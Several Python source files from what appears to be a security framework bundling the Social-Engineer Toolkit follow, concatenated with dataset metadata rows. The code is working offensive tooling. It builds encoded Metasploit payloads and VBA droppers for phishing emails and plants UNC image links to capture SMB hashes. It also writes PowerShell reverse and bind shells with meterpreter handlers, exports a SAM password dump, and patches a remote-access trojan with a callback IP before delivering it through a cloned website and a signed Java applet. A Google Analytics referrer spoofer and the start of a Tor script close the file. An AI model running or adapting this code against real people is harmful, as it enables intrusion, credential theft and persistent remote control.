while a == 1:
if counter == 10:
a = 2
print_error("Unable to generate PDF - there appears to be an issue with your Metasploit install.")
print_error("You will need to troubleshoot Metasploit manually and try generating a PDF. You can manually troubleshoot by going to /root/.set/ and typing msfconsole -r template.rc to reproduce the issue.")
pause = raw_input("Press {return} to move back.")
break
if os.path.isfile(userconfigpath + "" + outfile):
subprocess.Popen("cp " + msfpath + "local/%s %s" % (filename_code, userconfigpath),
stderr=subprocess.PIPE, stdout=subprocess.PIPE, shell=True)
a = 2 # break
else:
print_status("Waiting for payload generation to complete (be patient, takes a bit)...")
if os.path.isfile(msfpath + "local/" + outfile):
subprocess.Popen("cp %slocal/%s %s" %
(msfpath, outfile, userconfigpath), shell=True)
counter = counter + 1
time.sleep(3)
print_status("Payload creation complete.")
time.sleep(1)
print_status("All payloads get sent to the %s directory" % (outfile))
if exploit == 'custom/exe/to/vba/payload':
# Creating Payload here
# if not 64 specify raw output and filename of vb1.exe
if noencode == 0:
execute1 = ("raw")
payloadname = ("vb1.exe")
if noencode == 1:
execute1 = ("exe")
payloadname = ("vb.exe")
subprocess.Popen("%smsfvenom -p %s %s %s -e shikata_ga_nai --format=%s > %s/%s" %
(meta_path, payload, rhost, lport, execute1, userconfigpath, payloadname), shell=True)
if noencode == 0:
subprocess.Popen("%smsfvenom -e x86/shikata_ga_nai -i %s/vb1.exe -o %s/vb.exe -t exe -c 3" %
(meta_path, userconfigpath, userconfigpath), shell=True)
# Create the VB script here
subprocess.Popen("%s/tools/exe2vba.rb %s/vb.exe %s/template.vbs" %
(meta_path, userconfigpath, userconfigpath), shell=True)
print_info("Raring the VBS file.")
subprocess.Popen("rar a %s/template.rar %s/template.vbs" %
(userconfigpath, userconfigpath), shell=True)
# NEED THIS TO PARSE DELIVERY OPTIONS TO SMTP MAILER
filewrite = open(userconfigpath + "payload.options", "w")
filewrite.write(payload + " " + rhost + " " + lport)
filewrite.close()
if exploit != "dll_hijacking":
if not os.path.isfile(userconfigpath + "fileformat.file"):
sys.path.append("src/phishing/smtp/client/")
debug_msg(me, "importing 'src.phishing.smtp.client.smtp_client'", 1)
try:
module_reload(smtp_client)
except:
import smtp_client
# start the unc_embed attack stuff here
if exploit == "unc_embed":
rhost = grab_ipaddress
import string
import random
def random_string(minlength=6, maxlength=15):
length = random.randint(minlength, maxlength)
letters = string.ascii_letters + string.digits
return ''.join([random.choice(letters) for _ in range(length)])
rand_gen = random_string()
filewrite = open(userconfigpath + "unc_config", "w")
filewrite.write("use server/capture/smb\n")
filewrite.write("exploit -j\r\n\r\n")
filewrite.close()
filewrite = open(userconfigpath + "template.doc", "w")
filewrite.write(
r'''<html><head></head><body><img src="file://\\%s\%s.jpeg">''' % (rhost, rand_gen))
filewrite.close()
sys.path.append("src/phishing/smtp/client/")
debug_msg(me, "importing 'src.phishing.smtp.client.smtp_client'", 1)
try:
module_reload(smtp_client)
except:
import smtp_client
# start the dll_hijacking stuff here
if exploit == "dll_hijacking":
sys.path.append("src/core/payloadgen")
debug_msg(me, "importing 'src.core.payloadgen.create_payloads'", 1)
try:
module_reload(create_payloads)
except:
import create_payloads
sys.path.append("src/webattack/dll_hijacking")
debug_msg(me, "importing 'src.webattack.dll_hijacking.hijacking'", 1)
try:
module_reload(hijacking)
except:
import hijacking
# if we are not using apache
if apache == 0:
if not os.path.isfile("%s/fileformat.file" % (userconfigpath)):
filewrite = open(userconfigpath + "attack_vector", "w")
filewrite.write("hijacking")
filewrite.close()
filewrite = open(userconfigpath + "site.template", "w")
filewrite.write("TEMPLATE=CUSTOM")
filewrite.close()
time.sleep(1)
subprocess.Popen("mkdir %s/web_clone;cp src/html/msf.exe %s/web_clone/x" % (
userconfigpath, userconfigpath), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
child = pexpect.spawn("python3 src/html/web_server.py")
# if we are using apache
if apache == 1:
subprocess.Popen("cp src/html/msf.exe %s/x.exe" %
(apache_path), shell=True).wait()
if os.path.isfile(userconfigpath + "meta_config"):
# if we aren't using the infectious method then do normal routine
if not os.path.isfile("%s/fileformat.file" % (userconfigpath)):
print_info("This may take a few to load MSF...")
try:
child1 = pexpect.spawn(
"%smsfconsole -L -r %s/meta_config" % (meta_path, userconfigpath))
except:
try:
child1.close()
except:
pass
# get the emails out
# if we aren't using the infectious method then do the normal routine
if not os.path.isfile("%s/fileformat.file" % (userconfigpath)):
sys.path.append("src/phishing/smtp/client/")
debug_msg(me, "importing 'src.phishing.smtp.client.smtp_client'", 1)
try:
module_reload(smtp_client)
except:
import smtp_client
try:
child1.interact()
except:
if apache == 0:
try:
child.close()
child1.close()
except:
pass
| 13,929 | Python | .py | 315 | 35.825397 | 217 | 0.603052 | CHEGEBB/africana-framework | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,853 | powershell.py | CHEGEBB_africana-framework/externals/set/src/powershell/powershell.py | #!/usr/bin/python3
# coding=utf-8
#
#
# handle powershell payloads and get them ready
#
#
#
import os
import shutil
import subprocess
import src
import src.core.setcore as core
from src.core.menu import text
# Py2/3 compatibility
# Python3 renamed raw_input to input
try:
input = raw_input
except NameError:
pass
core.debug_msg(core.mod_name(), "printing 'text.powershell menu'", 5)
show_powershell_menu = core.create_menu(text.powershell_text, text.powershell_menu)
powershell_menu_choice = input(core.setprompt(["29"], ""))
if powershell_menu_choice != "0":
# specify ipaddress of reverse listener
ipaddr = core.grab_ipaddress()
ipaddr = input("Enter the IPAddress or DNS name for the reverse host: ")
core.update_options("IPADDR=" + ipaddr)
# if we select alphanumeric shellcode
if powershell_menu_choice == "1":
port = input(core.setprompt(["29"], "Enter the port for the reverse [443]"))
if not port:
port = "443"
core.update_options("PORT=" + port)
core.update_options("POWERSHELL_SOLO=ON")
core.print_status("Prepping the payload for delivery and injecting alphanumeric shellcode...")
with open(core.userconfigpath + "payload_options.shellcode", "w") as filewrite:
filewrite.write("windows/meterpreter/reverse_https {},".format(port))
try:
core.module_reload(src.payloads.powershell.prep)
except:
import src.payloads.powershell.prep
#prep_powershell_payload()
# create the directory if it does not exist
if not os.path.isdir(core.userconfigpath + "reports/powershell"):
os.makedirs(core.userconfigpath + "reports/powershell")
# here we format everything for us
with open(core.userconfigpath + "x86.powershell") as fileopen:
x86 = fileopen.read()
x86 = core.powershell_encodedcommand(x86)
core.print_status("If you want the powershell commands and attack, they are exported to {0}".format(os.path.join(core.userconfigpath, "reports/powershell/")))
with open(core.userconfigpath + "reports/powershell/x86_powershell_injection.txt", "w") as filewrite:
filewrite.write(x86)
choice = core.yesno_prompt("0", "Do you want to start the listener now [yes/no]: ")
if choice == 'NO':
pass
# if we want to start the listener
if choice == 'YES':
with open(core.userconfigpath + "reports/powershell/powershell.rc", "w") as filewrite:
filewrite.write("use multi/handler\n"
"set payload windows/meterpreter/reverse_https\n"
"set LPORT {0}\n"
"set LHOST 0.0.0.0\n"
"set ExitOnSession false\n"
"exploit -j".format(port))
msf_path = core.meta_path()
subprocess.Popen("{0} -r {1}".format(os.path.join(msf_path, "msfconsole"),
os.path.join(core.userconfigpath, "reports/powershell/powershell.rc")),
shell=True).wait()
core.print_status("Powershell files can be found under {0}".format(os.path.join(core.userconfigpath, "reports/powershell")))
core.return_continue()
# if we select powershell reverse shell
if powershell_menu_choice == "2":
# prompt for IP address and port
port = input(core.setprompt(["29"], "Enter the port for listener [443]"))
# default to 443
if not port:
port = "443"
# open the reverse shell up
core.print_status("Rewriting the powershell reverse shell with options")
with open("src/powershell/reverse.powershell") as fileopen:
data = fileopen.read()
data = data.replace("IPADDRHERE", ipaddr)
data = data.replace("PORTHERE", port)
core.print_status("Exporting the powershell stuff to {0}".format(os.path.join(core.userconfigpath, "reports/powershell")))
# create the directory if it does not exist
if not os.path.isdir(core.userconfigpath + "reports/powershell"):
os.makedirs(core.userconfigpath + "reports/powershell")
with open(core.userconfigpath + "reports/powershell/powershell.reverse.txt", "w") as filewrite:
filewrite.write(data)
choice = core.yesno_prompt("0", "Do you want to start a listener [yes/no]")
if choice == "NO":
core.print_status("Have netcat or standard socket listener on port {0}".format(port))
if choice == "YES":
core.socket_listener(port)
core.return_continue()
# if we select powershell bind shell
if powershell_menu_choice == "3":
port = input(core.setprompt(["29"], "Enter the port for listener [443]"))
# open file
with open("src/powershell/bind.powershell") as fileopen:
data = fileopen.read()
data = data.replace("PORTHERE", port)
# create the directory if it does not exist
if not os.path.isdir(core.userconfigpath + "reports/powershell"):
os.makedirs(core.userconfigpath + "reports/powershell")
with open(core.userconfigpath + "reports/powershell/powershell.bind.txt", "w") as filewrite:
filewrite.write(data)
core.print_status("The powershell program has been exported to {0}".format(os.path.join(core.userconfigpath, "reports/powershell/")))
core.return_continue()
# if we select powershell powerdump SAM dump
if powershell_menu_choice == "4":
# create the directory if it does not exist
if not os.path.isdir(core.userconfigpath + "reports/powershell"):
os.makedirs(core.userconfigpath + "reports/powershell")
# copy file
if os.path.isfile("src/powershell/powerdump.encoded"):
shutil.copyfile("src/powershell/powerdump.encoded", core.userconfigpath + "reports/powershell/powerdump.encoded.txt")
core.print_status("The powershell program has been exported to {}".format(os.path.join(core.userconfigpath, "reports/powershell")))
core.print_status("Note with PowerDump -- You MUST be running as SYSTEM when executing.")
core.return_continue()
| 6,325 | Python | .py | 121 | 42.694215 | 166 | 0.646926 | CHEGEBB/africana-framework | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,854 | ratte_only_module.py | CHEGEBB_africana-framework/externals/set/modules/ratte_only_module.py | #! /usr/bin/python3
#
# These are required fields
#
import os
import subprocess
from time import sleep
import src.core.setcore as core
from src.core.menu import text
# Py2/3 compatibility
# Python3 renamed raw_input to input
try:
input = raw_input
except NameError:
pass
# "This is RATTE (Remote Administration Tool Tommy Edition) prepare module.It will prepare a custom ratteM.exe."
MAIN="RATTE (Remote Administration Tool Tommy Edition) Create Payload only. Read the readme/RATTE-Readme.txt first"
AUTHOR="Thomas Werth"
#
# Start ratteserver
#
def ratte_listener_start(port):
subprocess.Popen("src/payloads/ratte/ratteserver %d" % port, shell=True).wait()
def prepare_ratte(ipaddr, ratteport, persistent, customexe):
core.print_info("preparing RATTE...")
# replace ipaddress with one that we need for reverse connection back
############
# Load content of RATTE
############
with open("src/payloads/ratte/ratte.binary", "rb") as fileopen:
data = fileopen.read()
############
# PATCH Server IP into RATTE
############
with open(os.path.join(core.userconfigpath, "ratteM.exe"), "wb") as filewrite:
host = (len(ipaddr) + 1) * "X"
r_port = (len(str(ratteport)) + 1) * "Y"
pers = (len(str(persistent)) + 1) * "Z"
# check ob cexe > 0, sonst wird ein Feld gepatcht (falsch!)
if customexe:
cexe = (len(str(customexe)) + 1) * "Q"
else:
cexe = ""
filewrite.write(data.replace(cexe, customexe + "\x00", 1).replace(pers, persistent + "\x00", 1).replace(host, ipaddr + "\x00", 1).replace(r_port, str(ratteport) + "\x00", 1))
# filewrite.write(data.replace(str(host), ipaddr+"\x00", 1).replace(str(rPort), str(ratteport)+"\x00", 1) )
# filewrite.write(data.replace(str(pers), persistent+"\x00", 1).replace(str(host), ipaddr+"\x00", 1).replace(str(rPort), str(ratteport)+"\x00", 1) )
# def main(): header is required
def main():
valid_site = False
valid_ip = False
valid_response = False
input_counter = 0
#################
# get User Input
#################
# ipaddr=input(setprompt(["9", "2"], "IP address to connect back on"))
while valid_ip != True and input_counter < 3:
ipaddr = input(core.setprompt(["9", "2"], "Enter the IP address to connect back on"))
valid_ip = core.validate_ip(ipaddr)
if not valid_ip:
if input_counter == 2:
core.print_error("\nMaybe you have the address written down wrong?")
sleep(4)
return
else:
input_counter += 1
# try:
# ratteport=int(input(setprompt(["9", "2"], "Port RATTE Server should listen on")))
# while ratteport==0 or ratteport > 65535:
# print_warning('Port must not be equal to javaport!')
# ratteport=int(input(setprompt(["9", "2"], "Enter port RATTE Server should listen on")))
# except ValueError:
# ratteport=8080
try:
ratteport = int(input(core.setprompt(["9", "2"], "Port RATTE Server should listen on [8080]")))
while ratteport == 0 or ratteport > 65535:
if ratteport == 0:
core.print_warning(text.PORT_NOT_ZERO)
if ratteport > 65535:
core.print_warning(text.PORT_TOO_HIGH)
ratteport = int(input(core.setprompt(["9", "2"], "Enter port RATTE Server should listen on [8080]")))
except ValueError:
# core.print_info("Port set to default of 8080")
ratteport = 8080
# persistent=input(setprompt(["9", "2"], "Should RATTE be persistent [no|yes]?"))
# if persistent == 'no' or persistent == '' or persistent == 'n':
# persistent='NO'
# else:
# persistent='YES'
while not valid_response:
persistent = input(core.setprompt(["9", "2"], "Should RATTE be persistent [no|yes]?"))
persistent = str.lower(persistent)
if persistent == "no" or persistent == "n":
persistent = "NO"
valid_response = True
elif persistent == "yes" or persistent == "y":
persistent = "YES"
valid_response = True
else:
core.print_warning(text.YES_NO_RESPONSES)
valid_response = False
customexe = input(core.setprompt(["9", "2"], "Use specifix filename (ex. firefox.exe) [filename.exe or empty]?"))
############
# prepare RATTE
############
prepare_ratte(ipaddr, ratteport, persistent, customexe)
core.print_status("Payload has been exported to %s" % os.path.join(core.userconfigpath, "ratteM.exe"))
###################
# start ratteserver
###################
# prompt=input(setprompt(["9", "2"], "Start the ratteserver listener now [yes|no]"))
# if prompt == "yes" or prompt == "" or prompt == "y":
# print_info("Starting ratteserver...")
# ratte_listener_start(ratteport)
while not valid_response:
prompt = input(core.setprompt(["9", "2"], "Start the ratteserver listener now [yes|no]"))
prompt = str.lower(prompt)
if prompt == "no" or prompt == "n":
# prompt = "NO"
core.print_error("Aborting...")
sleep(2)
valid_response = True
elif prompt == "yes" or prompt == "y":
core.print_info("Starting ratteserver...")
ratte_listener_start(ratteport)
core.print_info("Stopping ratteserver...")
sleep(2)
valid_response = True
else:
core.print_warning("valid responses are 'n|y|N|Y|no|yes|No|Yes|NO|YES'")
| 5,696 | Python | .py | 130 | 36.6 | 182 | 0.593288 | CHEGEBB/africana-framework | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,855 | ratte_module.py | CHEGEBB_africana-framework/externals/set/modules/ratte_module.py | #! /usr/bin/python3
#
# These are required fields
#
import os
import subprocess
from time import sleep
try:
from urllib.parse import urlparse
except ImportError:
from urlparse import urlparse
try:
import socketserver as SocketServer # Py3
except ImportError:
import SocketServer # Py2
try:
import http.server as SimpleHTTPServer # Py3
except ImportError:
import SimpleHTTPServer # Py2
try:
import _thread as thread # Py3
except ImportError:
import thread # Py2
import src.core.setcore as core
from src.core.menu import text
try:
input = raw_input
except NameError:
pass
definepath = os.getcwd()
userconfigpath = core.userconfigpath
MAIN="RATTE Java Applet Attack (Remote Administration Tool Tommy Edition) - Read the readme/RATTE_README.txt first"
# This is RATTE (Remote Administration Tool Tommy Edition) attack module. It will launch a java applet attack to inject RATTE. Then it will launch RATTE-Server and wait for victim to connect. RATTE can beat local Firewalls, IDS and even EAL 4+ certified network firewalls.
# This release one is only for education!"
AUTHOR="Thomas Werth"
httpd = None
#
# This will start a web server in the directory root you specify, so for example
# you clone a website then run it in that web server, it will pull any index.html file
#
def start_web_server_tw(directory, port):
global httpd
try:
# create the httpd handler for the simplehttpserver
# we set the allow_reuse_address in case something hangs can still bind to port
class ReusableTCPServer(SocketServer.TCPServer):
allow_reuse_address = True
# specify the httpd service on 0.0.0.0 (all interfaces) on port 80
httpd = ReusableTCPServer(("0.0.0.0", port), SimpleHTTPServer.SimpleHTTPRequestHandler)
# thread this mofo
thread.start_new_thread(httpd.serve_forever, ())
# change directory to the path we specify for output path
os.chdir(directory)
# handle keyboard interrupts
except KeyboardInterrupt:
core.print_info("Exiting the SET web server...")
httpd.socket.close()
# handle the rest
# except Exception:
# print "[*] Exiting the SET web server...\n"
# httpd.socket.close()
def stop_web_server_tw():
global httpd
try:
httpd.socket.close()
# handle the exception
except:
httpd.socket.close()
#
# This will create the java applet attack from start to finish.
# Includes payload (reverse_meterpreter for now) cloning website
# and additional capabilities.
#
def java_applet_attack_tw(website, port, directory, ipaddr):
# clone the website and inject java applet
core.site_cloner(website, directory, "java")
############################################
# use customized Ratte nehmen
############################################
# this part is needed to rename the msf.exe file to a randomly generated one
if os.path.isfile(os.path.join(userconfigpath, "rand_gen")):
# open the file
# start a loop
with open(os.path.join(userconfigpath, "rand_gen")) as fileopen:
for line in fileopen:
# define executable name and rename it
filename = line.rstrip()
# move the file to the specified directory and filename
subprocess.Popen("cp src/payloads/ratte/ratte.binary %s/%s 1> /dev/null 2> /dev/null" % (directory, filename), shell=True).wait()
# lastly we need to copy over the signed applet
subprocess.Popen("cp %s/Signed_Update.jar %s 1> /dev/null 2> /dev/null" % (userconfigpath, directory), shell=True).wait()
# TODO index.html parsen und IPADDR:Port ersetzen
with open(os.path.join(directory, "index.html"), "rb") as fileopen:
data = fileopen.read()
with open(os.path.join(directory, "index.html"), 'wb') as filewrite:
to_replace = core.grab_ipaddress() + ":80"
# replace 3 times
filewrite.write(data.replace(str(to_replace), ipaddr + ":" + str(port), 3))
# start the web server by running it in the background
start_web_server_tw(directory, port)
#
# Start ratteserver
#
def ratte_listener_start(port):
# launch ratteserver using ../ cause of reports/ subdir
# subprocess.Popen("%s/src/set_payloads/ratte/ratteserver %d" % (os.getcwd(),port), shell=True).wait()
subprocess.Popen("../src/payloads/ratte/ratteserver %d" % port, shell=True).wait()
def prepare_ratte(ipaddr, ratteport, persistent, customexe):
core.print_status("preparing RATTE...")
# replace ipaddress with one that we need for reverse connection back
############
# Load content of RATTE
############
with open("src/payloads/ratte/ratte.binary", "rb") as fileopen:
data = fileopen.read()
############
# PATCH Server IP into RATTE
############
with open(os.path.join(userconfigpath, "ratteM.exe"), 'wb') as filewrite:
host = (len(ipaddr) + 1) * "X"
r_port = (len(str(ratteport)) + 1) * "Y"
pers = (len(str(persistent)) + 1) * "Z"
# check ob cexe > 0, sonst wird ein Feld gepatcht (falsch!)
if customexe:
cexe = (len(str(customexe)) + 1) * "Q"
else:
cexe = ""
filewrite.write(data.replace(cexe, customexe + "\x00", 1).replace(pers, persistent + "\x00", 1).replace(host, ipaddr + "\x00", 1).replace(r_port, str(ratteport) + "\x00", 1))
# def main(): header is required
def main():
valid_site = False
valid_ip = False
# valid_persistence = False
input_counter = 0
site_input_counter = 0
ipaddr = None
website = None
# pause=input("This module has finished completing. Press <enter> to continue")
# Get a *VALID* website address
while not valid_site and site_input_counter < 3:
website = input(core.setprompt(["9", "2"], "Enter website to clone (ex. https://gmail.com)"))
site = urlparse(website)
if site.scheme == "http" or site.scheme == "https":
if site.netloc != "":
valid_site = True
else:
if site_input_counter == 2:
core.print_error("\nMaybe you have the address written down wrong?" + core.bcolors.ENDC)
sleep(4)
return
else:
core.print_warning("I can't determine the fqdn or IP of the site. Try again?")
site_input_counter += 1
else:
if site_input_counter == 2:
core.print_error("\nMaybe you have the address written down wrong?")
sleep(4)
return
else:
core.print_warning("I couldn't determine whether this is an http or https site. Try again?")
site_input_counter += 1
# core.DebugInfo("site.scheme is: %s " % site.scheme)
# core.DebugInfo("site.netloc is: %s " % site.netloc)
# core.DebugInfo("site.path is: %s " % site.path)
# core.DebugInfo("site.params are: %s " % site.params)
# core.DebugInfo("site.query is: %s " % site.query)
# core.DebugInfo("site.fragment is: %s " % site.fragment)
while not valid_ip and input_counter < 3:
ipaddr = input(core.setprompt(["9", "2"], "Enter the IP address to connect back on"))
valid_ip = core.validate_ip(ipaddr)
if not valid_ip:
if input_counter == 2:
core.print_error("\nMaybe you have the address written down wrong?")
sleep(4)
return
else:
input_counter += 1
# javaport must be 80, cause applet uses in web injection port 80 to download payload!
try:
javaport = int(input(core.setprompt(["9", "2"], "Port Java applet should listen on [80]")))
while javaport == 0 or javaport > 65535:
if javaport == 0:
core.print_warning(text.PORT_NOT_ZERO)
if javaport > 65535:
core.print_warning(text.PORT_TOO_HIGH)
javaport = int(input(core.setprompt(["9", "2"], "Port Java applet should listen on [80]")))
except ValueError:
# core.print_info("Port set to default of 80")
javaport = 80
try:
ratteport = int(input(core.setprompt(["9", "2"], "Port RATTE Server should listen on [8080]")))
while ratteport == javaport or ratteport == 0 or ratteport > 65535:
if ratteport == javaport:
core.print_warning("Port must not be equal to javaport!")
if ratteport == 0:
core.print_warning(text.PORT_NOT_ZERO)
if ratteport > 65535:
core.print_warning(text.PORT_TOO_HIGH)
ratteport = int(input(core.setprompt(["9", "2"], "Port RATTE Server should listen on [8080]")))
except ValueError:
ratteport = 8080
persistent = core.yesno_prompt(["9", "2"], "Should RATTE be persistentententent [no|yes]?")
# j0fer 06-27-2012 # while valid_persistence != True:
# j0fer 06-27-2012 # persistent=input(core.setprompt(["9", "2"], "Should RATTE be persistent [no|yes]?"))
# j0fer 06-27-2012 # persistent=str.lower(persistent)
# j0fer 06-27-2012 # if persistent == "no" or persistent == "n":
# j0fer 06-27-2012 # persistent="NO"
# j0fer 06-27-2012 # valid_persistence = True
# j0fer 06-27-2012 # elif persistent == "yes" or persistent == "y":
# j0fer 06-27-2012 # persistent="YES"
# j0fer 06-27-2012 # valid_persistence = True
# j0fer 06-27-2012 # else:
# j0fer 06-27-2012 # core.print_warning(text.YES_NO_RESPONSES)
customexe = input(core.setprompt(["9", "2"], "Use specifix filename (ex. firefox.exe) [filename.exe or empty]?"))
#######################################
# prepare RATTE
#######################################
prepare_ratte(ipaddr, ratteport, persistent, customexe)
######################################
# Java Applet Attack to deploy RATTE
#######################################
core.print_info("Starting java applet attack...")
java_applet_attack_tw(website, javaport, "reports/", ipaddr)
with open(os.path.join(userconfigpath, definepath, "/rand_gen")) as fileopen:
for line in fileopen:
ratte_random = line.rstrip()
subprocess.Popen("cp %s/ratteM.exe %s/reports/%s" % (os.path.join(userconfigpath, definepath), definepath, ratte_random), shell=True).wait()
#######################
# start ratteserver
#######################
core.print_info("Starting ratteserver...")
ratte_listener_start(ratteport)
######################
# stop webserver
######################
stop_web_server_tw()
return
| 11,046 | Python | .py | 237 | 39.021097 | 272 | 0.605894 | CHEGEBB/africana-framework | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,856 | google_analytics_attack.py | CHEGEBB_africana-framework/externals/set/modules/google_analytics_attack.py | #!/usr/bin/env python3
from __future__ import print_function
print("Loading module. Please wait...")
import src.core.setcore
import sys
import requests
import re
import time
import random
try:
input = raw_input
except NameError:
pass
MAIN="Google Analytics Attack by @ZonkSec"
AUTHOR="Tyler Rosonke (@ZonkSec)"
### MAIN ###
def main():
print_title()
# determins if auto or manual, then calls functions
mode_choice = input("[*] Choose mode (automatic/manual): ")
if mode_choice in ("automatic","auto"):
print("\n[*] Entering automatic mode.\n")
url = input("[*] Target website (E.g. 'http://xyz.com/'): ")
params = auto_params(url)
elif mode_choice in ("manual","man"):
print("\n[*] Entering manual mode.")
params = manual_params()
else:
print("\n[-] Invalid mode.\n")
sys.exit()
# params have been collected, prompts for print
print("\n[+] Payload ready.")
printchoice = input("\n[*] Print payload?(y/n): ")
if printchoice == "y":
print_params(params)
#sends request
input("\nPress <enter> to send payload.")
send_spoof(params)
#prompts for loop, calls function if need be
loopchoice = input("\n[*] Send payload on loop?(y/n) ")
if loopchoice == "y":
looper(params)
input("\n\nThis module has finished completing. Press <enter> to continue")
### print_params - loops through params and prints
def print_params(params):
print()
for entry in params:
print(entry + " = " + params[entry])
### looper - prompts for seconds to sleep, starts loop
def looper(params):
secs = input("[*] Seconds between payload sends: ")
input("\nSending request every "+secs+" seconds. Use CTRL+C to terminate. Press <enter> to begin loop.")
while True:
send_spoof(params)
time.sleep(int(secs))
### send_spoof - randomizes client id, then sends request to google service
def send_spoof(params):
params['cid'] = random.randint(100,999)
r = requests.get('https://www.google-analytics.com/collect', params=params)
print("\n[+] Payload sent.")
print(r.url)
### auto_params - makes request to target site, regexes for params
def auto_params(url):
try: #parses URL for host and page
m = re.search('(https?:\/\/(.*?))\/(.*)',url)
host = str(m.group(1))
page = "/" + str(m.group(3))
except:
print("\n[-] Unable to parse URL for host/page. Did you forget an ending '/'?\n")
sys.exit()
try: #makes request to target page
r = requests.get(url)
except:
print("\n[-] Unable to reach target website for parsing.\n")
sys.exit()
try: #parses target webpage for title
m = re.search('<title>(.*)<\/title>', r.text)
page_title = str(m.group(1))
except:
print("\n[-] Unable to parse target page for title.\n")
sys.exit()
try: #parses target webpage for tracking id
m = re.search("'(UA-(.*))',", r.text)
tid = str(m.group(1))
except:
print("\n[-] Unable to find TrackingID (UA-XXXXX). Website may not be running Google Anayltics.\n")
sys.exit()
#builds params dict
params = {}
params['v'] = "1"
params['tid'] = tid
params['cid'] = "555"
params['t'] = "pageview"
params['dh'] = host
params['dp'] = page
params['dt'] = page_title
params['aip'] = "1"
params['dr'] = input("\n[*] Enter referral URL to spoof (E.g. 'http://xyz.com/'): ")
return params
### manual_params - prompts for all params
def manual_params():
params = {}
params['v'] = "1"
params['tid'] = input("\n[*] Enter TrackingID (tid)(UA-XXXXX): ")
params['cid'] = "555"
params['t'] = "pageview"
params['aip'] = "1"
params['dh'] = input("[*] Enter target host (dh)(E.g. 'http://xyz.xyz)': ")
params['dp'] = input("[*] Enter target page (dp)(E.g. '/aboutme'): ")
params['dt'] = input("[*] Enter target page title (dt)(E.g. 'About Me'): ")
params['dr'] = input("[*] Enter referal page to spoof (dr): ")
return params
### print_title - prints title and references
def print_title():
print("\n----------------------------------")
print(" Google Analytics Attack ")
print(" By Tyler Rosonke (@ZonkSec) ")
print("----------------------------------\n")
print("User-Guide: http://www.zonksec.com/blog/social-engineering-google-analytics/\n")
print("References:")
print("-https://developers.google.com/analytics/devguides/collection/protocol/v1/reference")
print("-https://developers.google.com/analytics/devguides/collection/protocol/v1/parameters\n\n")
| 4,675 | Python | .py | 122 | 33.196721 | 108 | 0.612726 | CHEGEBB/africana-framework | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,857 | vanish.py | CHEGEBB_africana-framework/externals/tor-vanish/vanish.py | #!/usr/bin/python3
import os
import re
import sys
import time
import random
import requests
import subprocess
from signal import signal, SIGINT
def check_os():
if os.name == "nt":
operating_system = "windows"
if os.name == "posix":
operating_system = "posix"
return operating_system
if check_os() == "posix":
class bcolors:
PURPLE = '\033[95m'
CYAN = '\033[96m'
DARKCYAN = '\033[36m'
BLUE = '\033[94m'
GREEN = '\033[92m'
YELLOW = '\033[93m'
RED = '\033[91m'
BOLD = '\033[1m'
UNDERL = '\033[4m'
ENDC = '\033[0m'
backBlack = '\033[40m'
backRed = '\033[41m'
backGREEN = '\033[42m'
backYellow = '\033[43m'
backBlue = '\033[44m'
backMagenta = '\033[45m'
backCyan = '\033[46m'
backWhite = '\033[47m'
def disable(self):
self.PURPLE = ''
self.CYAN = ''
self.BLUE = ''
self.GREEN = ''
self.YELLOW = ''
self.RED = ''
self.ENDC = ''
self.BOLD = ''
self.UNDERL = ''
self.backBlack = ''
self.backRed = ''
self.backGREEN = ''
self.backYellow = ''
self.backBlue = ''
self.backMagenta = ''
self.backCyan = ''
self.backWhite = ''
self.DARKCYAN = ''
else:
class bcolors:
PURPLE = ''
CYAN = ''
DARKCYAN = ''
BLUE = ''
GREEN = ''
YELLOW = ''
RED = ''
BOLD = ''
UNDERL = ''
ENDC = ''
backBlack = ''
backRed = ''
backGREEN = ''
backYellow = ''
backBlue = ''
backMagenta = ''
backCyan = ''
backWhite = ''
def disable(self):
self.PURPLE = ''
self.CYAN = ''
self.BLUE = ''
self.GREEN = ''
self.YELLOW = ''
self.RED = ''
self.ENDC = ''
self.BOLD = ''
self.UNDERL = ''
self.backBlack = ''
self.backRed = ''
self.backGREEN = ''
self.backYellow = ''
self.backBlue = ''
self.backMagenta = ''
self.backCyan = ''
self.backWhite = ''
self.DARKCYAN = ''
color_taken = []
def color(*args):
colors = [bcolors.BLUE, bcolors.PURPLE, bcolors.CYAN, bcolors.DARKCYAN, bcolors.GREEN,
bcolors.YELLOW, bcolors.RED]
if args:
args, = args
return args
else:
if not color_taken: return random.choice(colors)
else:
return random.choice(list(set(colors).difference(color_taken)))
check_os()
def sudo():
if not os.geteuid() == 0:
sys.exit(color() + "I'm afraid I need some superuser privilages, Start with 'sudo'. Jesus Loves You ¯\(ツ)/¯" + bcolors.ENDC)
def handler(signal_received, frame):
print(color() + bcolors.BOLD + "\nCTRL-C detected. Exiting.... ")
exit(0)
if __name__ == '__main__':
signal(SIGINT, handler)
def logo(*args):
global color_taken
print(bcolors.BLUE + r"""
███████▓█████▓▓╬╬╬╬╬╬╬╬▓███▓╬╬╬╬╬╬╬▓╬╬▓█
████▓▓▓▓╬╬▓█████╬╬╬╬╬╬███▓╬╬╬╬╬╬╬╬╬╬╬╬╬█
███▓▓▓▓╬╬╬╬╬╬▓██╬╬╬╬╬╬▓▓╬╬╬╬╬╬╬╬╬╬╬╬╬╬▓█
████▓▓▓╬╬╬╬╬╬╬▓█▓╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬▓█
███▓█▓███████▓▓███▓╬╬╬╬╬╬▓███████▓╬╬╬╬▓█
████████████████▓█▓╬╬╬╬╬▓▓▓▓▓▓▓▓╬╬╬╬╬╬╬█
███▓▓▓▓▓▓▓▓▓▓▓▓▓▓█▓╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬▓█
████▓▓▓▓▓▓▓▓▓▓▓▓▓█▓╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬▓█
███▓█▓▓▓▓▓▓▓▓▓▓▓▓▓▓╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬▓█
